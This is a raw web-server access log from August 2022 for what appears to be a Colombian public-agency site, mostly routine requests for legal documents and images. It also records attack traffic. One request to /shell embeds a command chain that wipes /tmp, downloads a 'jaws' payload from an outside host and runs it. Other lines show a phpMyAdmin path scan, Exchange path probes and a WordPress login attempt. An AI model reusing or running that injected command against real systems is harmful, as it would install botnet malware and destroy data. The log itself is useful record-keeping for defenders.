186.144.252.26 - - [13/Aug/2022:17:26:17 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0686.pdf HTTP/1.1" 200 329080
172.22.2.4 - - [13/Aug/2022:17:26:21 -0500] "GET /BLA/boletinlegal/owa/auth/logon.aspx HTTP/1.1" 404 1018
201.245.192.253 - - [13/Aug/2022:17:26:37 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
172.22.2.4 - - [13/Aug/2022:17:27:04 -0500] "GET /BLA/boletinlegal/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 404 1018
216.245.221.92 - - [13/Aug/2022:17:27:24 -0500] "HEAD / HTTP/1.1" 200 -
162.142.125.213 - - [13/Aug/2022:17:29:03 -0500] "GET / HTTP/1.1" 200 319
162.142.125.213 - - [13/Aug/2022:17:29:03 -0500] "PRI * HTTP/2.0" 400 946
172.22.2.4 - - [13/Aug/2022:17:29:58 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=4584&usuario=&sector=&fecha=2021&resuelve= HTTP/1.1" 200 1067
172.22.2.4 - - [13/Aug/2022:17:30:00 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=4584&usuario=&sector=&fecha=2021&resuelve= HTTP/1.1" 200 1067
172.22.2.4 - - [13/Aug/2022:17:28:48 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [13/Aug/2022:17:30:30 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47401
201.245.192.253 - - [13/Aug/2022:17:30:34 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 48470
40.77.167.65 - - [13/Aug/2022:17:30:48 -0500] "GET /BLA/resoluciones/AUTOS%202018/2990.pdf HTTP/1.1" 304 -
172.22.2.4 - - [13/Aug/2022:17:29:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60865
201.245.192.253 - - [13/Aug/2022:17:31:36 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
191.88.165.146 - - [13/Aug/2022:17:32:10 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
191.88.165.146 - - [13/Aug/2022:17:32:10 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
191.88.165.146 - - [13/Aug/2022:17:32:10 -0500] "GET /galeria/galeria/fotos/juan-amarillo1P.jpg HTTP/1.1" 200 30845
191.88.165.146 - - [13/Aug/2022:17:32:10 -0500] "GET /galeria/galeria/fotos/juan-amarillo2P.jpg HTTP/1.1" 200 32696
191.88.165.146 - - [13/Aug/2022:17:32:10 -0500] "GET /galeria/galeria/fotos/juan-amarillo3P.jpg HTTP/1.1" 200 28033
191.88.165.146 - - [13/Aug/2022:17:32:11 -0500] "GET /galeria/galeria/fotos/juan-amarillo4P.jpg HTTP/1.1" 200 23811
216.245.221.92 - - [13/Aug/2022:17:32:24 -0500] "HEAD / HTTP/1.1" 200 -
2.57.122.98 - - [13/Aug/2022:17:33:01 -0500] "GET / HTTP/1.1" 200 319
66.220.149.17 - - [13/Aug/2022:17:34:59 -0500] "GET /images/cronica-amanda-rodriguez-30-abril.jpg HTTP/1.1" 200 26304
172.22.2.4 - - [13/Aug/2022:17:34:38 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [13/Aug/2022:17:36:35 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=4624&usuario=&sector=&fecha=2021&resuelve= HTTP/1.1" 200 1074
201.245.192.253 - - [13/Aug/2022:17:36:35 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
172.22.2.4 - - [13/Aug/2022:17:35:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60272
216.245.221.92 - - [13/Aug/2022:17:37:24 -0500] "HEAD / HTTP/1.1" 200 -
173.252.83.5 - - [13/Aug/2022:17:38:26 -0500] "GET /images/pieza-grafica-semana-ambiental-30.jpg HTTP/1.1" 200 38850
2.57.122.98 - - [13/Aug/2022:17:39:32 -0500] "GET / HTTP/1.1" 200 319
124.221.186.26 - - [13/Aug/2022:17:40:25 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [13/Aug/2022:17:40:30 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47401
201.245.192.253 - - [13/Aug/2022:17:40:34 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 48470
201.245.192.253 - - [13/Aug/2022:17:41:34 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
172.22.2.4 - - [13/Aug/2022:17:40:28 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [13/Aug/2022:17:42:24 -0500] "HEAD / HTTP/1.1" 200 -
187.140.15.229 - - [13/Aug/2022:17:42:27 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+synss.cf/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
172.22.2.4 - - [13/Aug/2022:17:41:18 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56723
172.22.2.4 - - [13/Aug/2022:17:42:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
172.22.2.4 - - [13/Aug/2022:17:43:09 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=4672&usuario=&sector=&fecha=2021&resuelve= HTTP/1.1" 200 1075
34.91.218.32 - - [13/Aug/2022:17:43:11 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [13/Aug/2022:17:46:33 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
198.74.59.35 - - [13/Aug/2022:17:46:46 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
198.74.59.35 - - [13/Aug/2022:17:46:46 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
198.74.59.35 - - [13/Aug/2022:17:46:46 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
216.245.221.92 - - [13/Aug/2022:17:47:24 -0500] "HEAD / HTTP/1.1" 200 -
173.252.87.11 - - [13/Aug/2022:17:47:26 -0500] "GET /images/negocios-verdes-mayo-2022.jpg HTTP/1.1" 200 48000
172.22.2.4 - - [13/Aug/2022:17:45:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 47814
23.100.232.233 - - [13/Aug/2022:17:47:51 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
23.100.232.233 - - [13/Aug/2022:17:47:51 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
23.100.232.233 - - [13/Aug/2022:17:47:51 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
172.22.2.4 - - [13/Aug/2022:17:46:18 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [13/Aug/2022:17:47:08 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53631
172.22.2.4 - - [13/Aug/2022:17:49:27 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=4922&usuario=&sector=&fecha=2021&resuelve= HTTP/1.1" 200 1081
172.22.2.4 - - [13/Aug/2022:17:49:42 -0500] "GET /BLA/boletinlegal/Circulares/2022/CIRCULAR%20No.%2000005%20DEL%2030%20DE%20JUNIO%20DEL%202022.pdf HTTP/1.1" 404 1218
172.22.2.4 - - [13/Aug/2022:17:49:47 -0500] "GET /BLA/boletinlegal/Circulares/2019/.pdf HTTP/1.1" 404 1218
201.245.192.253 - - [13/Aug/2022:17:51:32 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
216.245.221.92 - - [13/Aug/2022:17:52:24 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [13/Aug/2022:17:52:08 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [13/Aug/2022:17:52:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60272
172.22.2.4 - - [13/Aug/2022:17:54:51 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=5091&usuario=&sector=&fecha=2021&resuelve= HTTP/1.1" 200 1088
201.245.192.253 - - [13/Aug/2022:17:56:30 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
173.231.60.194 - - [13/Aug/2022:17:56:52 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [13/Aug/2022:17:57:24 -0500] "HEAD / HTTP/1.1" 200 -
192.168.176.26 - - [13/Aug/2022:17:57:56 -0500] "POST /BLA/boletinlegal/admin/notificaciones/ingresar.php HTTP/1.1" 200 30281
192.168.176.26 - - [13/Aug/2022:17:57:56 -0500] "GET /BLA/boletinlegal/admin/css/creation.css HTTP/1.1" 200 3945
192.168.176.26 - - [13/Aug/2022:17:57:56 -0500] "GET /css/global/buttons.css HTTP/1.1" 404 1312
192.168.176.26 - - [13/Aug/2022:17:57:57 -0500] "GET /BLA/boletinlegal/images/favicon.ico HTTP/1.1" 404 1334
172.22.2.4 - - [13/Aug/2022:17:59:09 -0500] "GET /BLA/boletinlegal/doctrina.php HTTP/1.1" 200 5604
172.22.2.4 - - [13/Aug/2022:17:57:58 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [13/Aug/2022:17:58:48 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 50037
172.22.2.4 - - [13/Aug/2022:17:59:09 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 51621
172.22.2.4 - - [13/Aug/2022:18:00:53 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=3406&usuario=&sector=&fecha=2021&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [13/Aug/2022:18:01:00 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=3406&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 1074
201.245.192.253 - - [13/Aug/2022:18:01:29 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
216.245.221.92 - - [13/Aug/2022:18:02:24 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.145 - - [13/Aug/2022:18:05:08 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [13/Aug/2022:18:03:48 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
222.106.123.6 - - [13/Aug/2022:18:05:39 -0500] "GET /admin/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:05:40 -0500] "GET /php-myadmin/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:05:40 -0500] "GET /phpMyAdmin5.2/index.php?lang=en HTTP/1.1" 403 1165
222.106.123.6 - - [13/Aug/2022:18:05:40 -0500] "GET /sql/sqladmin/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:05:41 -0500] "GET /admin/pma/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:05:41 -0500] "GET /phpmy/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:05:41 -0500] "GET /sql/webdb/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:05:41 -0500] "GET /mysql/pMA/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:05:42 -0500] "GET /db/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:05:42 -0500] "GET /phpmyadmin2013/index.php?lang=en HTTP/1.1" 403 1165
222.106.123.6 - - [13/Aug/2022:18:05:42 -0500] "GET /mysql/sqlmanager/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:05:42 -0500] "GET /phpmyadmin2019/index.php?lang=en HTTP/1.1" 403 1165
222.106.123.6 - - [13/Aug/2022:18:05:43 -0500] "GET /shopdb/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:05:43 -0500] "GET /phpmy-admin/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:05:43 -0500] "GET /phpmyadmin4/index.php?lang=en HTTP/1.1" 403 1165
222.106.123.6 - - [13/Aug/2022:18:05:43 -0500] "GET /phpMyAdmin/index.php?lang=en HTTP/1.1" 403 1165
222.106.123.6 - - [13/Aug/2022:18:05:44 -0500] "GET /2phpmyadmin/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:05:44 -0500] "GET /sql/phpmy-admin/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:05:44 -0500] "GET /db/db-admin/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:05:44 -0500] "GET /admin/phpMyAdmin/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:05:45 -0500] "GET /administrator/admin/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:05:45 -0500] "GET /db/phpMyAdmin-5/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:05:45 -0500] "GET /sql/phpMyAdmin/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:05:45 -0500] "GET /db/phpMyAdmin-3/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:05:46 -0500] "GET /phpmyadmin2015/index.php?lang=en HTTP/1.1" 403 1165
222.106.123.6 - - [13/Aug/2022:18:05:46 -0500] "GET /db/dbweb/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:05:46 -0500] "GET /db/phpmyadmin/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:05:47 -0500] "GET /phpMyAdmin-5.1.1/index.php?lang=en HTTP/1.1" 403 1165
222.106.123.6 - - [13/Aug/2022:18:05:47 -0500] "GET /sql/sqlweb/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:05:47 -0500] "GET /phpmyadmin2021/index.php?lang=en HTTP/1.1" 403 1165
222.106.123.6 - - [13/Aug/2022:18:05:47 -0500] "GET /MyAdmin/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:05:48 -0500] "GET /db/webadmin/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:05:48 -0500] "GET /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:05:48 -0500] "GET /phpMyAdmin-5.1.2/index.php?lang=en HTTP/1.1" 403 1165
222.106.123.6 - - [13/Aug/2022:18:05:48 -0500] "GET /admin/sqladmin/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:05:49 -0500] "GET /mysql/mysqlmanager/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:05:49 -0500] "GET /db/phpMyAdmin3/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:05:49 -0500] "GET /sql/websql/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:05:49 -0500] "GET /phpmyadmin2016/index.php?lang=en HTTP/1.1" 403 1165
222.106.123.6 - - [13/Aug/2022:18:05:50 -0500] "GET /administrator/db/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:05:50 -0500] "GET /db/myadmin/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:05:50 -0500] "GET /phpmyadmin2020/index.php?lang=en HTTP/1.1" 403 1165
222.106.123.6 - - [13/Aug/2022:18:05:51 -0500] "GET /db/websql/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:05:51 -0500] "GET /phpmyAdmin/index.php?lang=en HTTP/1.1" 403 1165
222.106.123.6 - - [13/Aug/2022:18:05:51 -0500] "GET /mysql/web/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:05:51 -0500] "GET /phpmyadmin2011/index.php?lang=en HTTP/1.1" 403 1165
222.106.123.6 - - [13/Aug/2022:18:05:52 -0500] "GET /database/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:05:52 -0500] "GET /phpmyadmin1/index.php?lang=en HTTP/1.1" 403 1165
222.106.123.6 - - [13/Aug/2022:18:05:52 -0500] "GET /PMA/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:05:52 -0500] "GET /db/phpmyadmin5/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:05:53 -0500] "GET /phpmyadmin2012/index.php?lang=en HTTP/1.1" 403 1165
222.106.123.6 - - [13/Aug/2022:18:05:53 -0500] "GET /myadmin/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:05:53 -0500] "GET /phpMyAdmin-4/index.php?lang=en HTTP/1.1" 403 1165
222.106.123.6 - - [13/Aug/2022:18:05:53 -0500] "GET /phpMyAdmin3/index.php?lang=en HTTP/1.1" 403 1165
222.106.123.6 - - [13/Aug/2022:18:05:54 -0500] "GET /_phpMyAdmin/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:05:54 -0500] "GET /administrator/pma/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:05:54 -0500] "GET /phpMyAdmin4/index.php?lang=en HTTP/1.1" 403 1165
222.106.123.6 - - [13/Aug/2022:18:05:54 -0500] "GET /phpmyadmin2/index.php?lang=en HTTP/1.1" 403 1165
222.106.123.6 - - [13/Aug/2022:18:05:55 -0500] "GET /mysql/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:05:55 -0500] "GET /administrator/phpmyadmin/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:05:55 -0500] "GET /sql/sql/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:05:55 -0500] "GET /db/phpMyAdmin-4/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:05:56 -0500] "GET /mysqlmanager/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:05:56 -0500] "GET /phpMyAdmin_/index.php?lang=en HTTP/1.1" 403 1165
222.106.123.6 - - [13/Aug/2022:18:05:56 -0500] "GET /sqlmanager/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:05:57 -0500] "GET /phpmyadmin2017/index.php?lang=en HTTP/1.1" 403 1165
222.106.123.6 - - [13/Aug/2022:18:05:57 -0500] "GET /sql/webadmin/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:05:57 -0500] "GET /mysql/db/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:05:57 -0500] "GET /phpmyadmin3/index.php?lang=en HTTP/1.1" 403 1165
222.106.123.6 - - [13/Aug/2022:18:05:58 -0500] "GET /admin/web/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:05:58 -0500] "GET /mysql/dbadmin/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:05:58 -0500] "GET /phpMyAdmin1/index.php?lang=en HTTP/1.1" 403 1165
222.106.123.6 - - [13/Aug/2022:18:05:58 -0500] "GET /phpmyadmin2018/index.php?lang=en HTTP/1.1" 403 1165
222.106.123.6 - - [13/Aug/2022:18:05:59 -0500] "GET /phpMyAdmin-5.1.0/index.php?lang=en HTTP/1.1" 403 1165
222.106.123.6 - - [13/Aug/2022:18:05:59 -0500] "GET /sql/myadmin/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:05:59 -0500] "GET /phpMyAdmin-5.2.0/index.php?lang=en HTTP/1.1" 403 1165
222.106.123.6 - - [13/Aug/2022:18:05:59 -0500] "GET /db/phpmyadmin4/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:06:00 -0500] "GET /mysql/pma/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:06:00 -0500] "GET /pma/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:06:00 -0500] "GET /phpMyAdmin-4.9.7/index.php?lang=en HTTP/1.1" 403 1165
222.106.123.6 - - [13/Aug/2022:18:06:01 -0500] "GET /1phpmyadmin/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:06:01 -0500] "GET /db/phpmyadmin3/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:06:01 -0500] "GET /phpmyadmin/index.php?lang=en HTTP/1.1" 403 1165
222.106.123.6 - - [13/Aug/2022:18:06:01 -0500] "GET /db/webdb/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:06:02 -0500] "GET /administrator/PMA/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:06:02 -0500] "GET /db/dbadmin/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:06:02 -0500] "GET /sql/phpmyadmin4/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:06:02 -0500] "GET /phpMyadmin/index.php?lang=en HTTP/1.1" 403 1165
222.106.123.6 - - [13/Aug/2022:18:06:03 -0500] "GET /_phpmyadmin_/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:06:03 -0500] "GET /phpmyadmin5/index.php?lang=en HTTP/1.1" 403 1165
222.106.123.6 - - [13/Aug/2022:18:06:03 -0500] "GET /sql/phpMyAdmin2/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:06:03 -0500] "GET /php-my-admin/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:06:04 -0500] "GET /mysql-admin/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:06:04 -0500] "GET /administrator/web/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:06:04 -0500] "GET /administrator/phpMyAdmin/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:06:04 -0500] "GET /admin/sysadmin/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:06:05 -0500] "GET /sql/phpmyadmin5/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:06:05 -0500] "GET /program/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:06:05 -0500] "GET /phpMyAdmin5/index.php?lang=en HTTP/1.1" 403 1165
222.106.123.6 - - [13/Aug/2022:18:06:06 -0500] "GET /sql/phpmanager/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:06:06 -0500] "GET /phpMyAdmin-3/index.php?lang=en HTTP/1.1" 403 1165
222.106.123.6 - - [13/Aug/2022:18:06:06 -0500] "GET /mysql/admin/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:06:06 -0500] "GET /phpmyadmin_/index.php?lang=en HTTP/1.1" 403 1165
222.106.123.6 - - [13/Aug/2022:18:06:07 -0500] "GET /phpMyAdmin2/index.php?lang=en HTTP/1.1" 403 1165
222.106.123.6 - - [13/Aug/2022:18:06:07 -0500] "GET /phpmyadmin2022/index.php?lang=en HTTP/1.1" 403 1165
222.106.123.6 - - [13/Aug/2022:18:06:07 -0500] "GET /dbadmin/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:06:07 -0500] "GET /admin/phpmyadmin/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:06:08 -0500] "GET /db/phpMyAdmin/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:06:08 -0500] "GET /sql/php-myadmin/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:06:08 -0500] "GET /sql/sql-admin/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:06:08 -0500] "GET /phppma/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:06:09 -0500] "GET /mysqladmin/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:06:09 -0500] "GET /_phpmyadmin/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:06:09 -0500] "GET /admin/db/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:06:09 -0500] "GET /phpMyAdmin-5.1.3/index.php?lang=en HTTP/1.1" 403 1165
222.106.123.6 - - [13/Aug/2022:18:06:10 -0500] "GET /sql/phpmyadmin3/index.php?lang=en HTTP/1.1" 404 1018
222.106.123.6 - - [13/Aug/2022:18:06:10 -0500] "GET /phpmyadmin2014/index.php?lang=en HTTP/1.1" 403 1165
222.106.123.6 - - [13/Aug/2022:18:06:10 -0500] "GET /phpMyAdmin5.1/index.php?lang=en HTTP/1.1" 403 1165
222.106.123.6 - - [13/Aug/2022:18:06:11 -0500] "GET /phpMyAdmin-5/index.php?lang=en HTTP/1.1" 403 1165
172.22.2.4 - - [13/Aug/2022:18:04:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59819
201.245.192.253 - - [13/Aug/2022:18:06:28 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
216.245.221.92 - - [13/Aug/2022:18:07:24 -0500] "HEAD / HTTP/1.1" 200 -
23.100.232.233 - - [13/Aug/2022:18:07:55 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
23.100.232.233 - - [13/Aug/2022:18:07:55 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
23.100.232.233 - - [13/Aug/2022:18:07:55 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
185.119.81.109 - - [13/Aug/2022:18:09:04 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.109 - - [13/Aug/2022:18:09:05 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
40.77.167.98 - - [13/Aug/2022:18:09:13 -0500] "-" 408 -
172.22.2.4 - - [13/Aug/2022:18:09:26 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=3422&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 1093
23.100.232.233 - - [13/Aug/2022:18:10:50 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
23.100.232.233 - - [13/Aug/2022:18:10:50 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
23.100.232.233 - - [13/Aug/2022:18:10:51 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
172.22.2.4 - - [13/Aug/2022:18:09:38 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [13/Aug/2022:18:11:27 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
172.22.2.4 - - [13/Aug/2022:18:10:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60865
216.245.221.92 - - [13/Aug/2022:18:12:24 -0500] "HEAD / HTTP/1.1" 200 -
190.68.153.221 - - [13/Aug/2022:18:12:29 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/2903.pdf HTTP/1.1" 200 474460
190.68.153.221 - - [13/Aug/2022:18:12:29 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
172.22.2.4 - - [13/Aug/2022:18:15:38 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=5078&usuario=&sector=&fecha=2021&resuelve= HTTP/1.1" 200 1070
201.245.192.253 - - [13/Aug/2022:18:16:26 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
92.118.39.88 - - [13/Aug/2022:18:16:48 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [13/Aug/2022:18:15:28 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [13/Aug/2022:18:17:22 -0500] "GET /BLA/boletinlegal/Directivas/2009/Directiva%20No.%20del%2023%20de%20Diciembre%20de%202009.pdf HTTP/1.1" 304 -
216.245.221.92 - - [13/Aug/2022:18:17:24 -0500] "HEAD / HTTP/1.1" 200 -
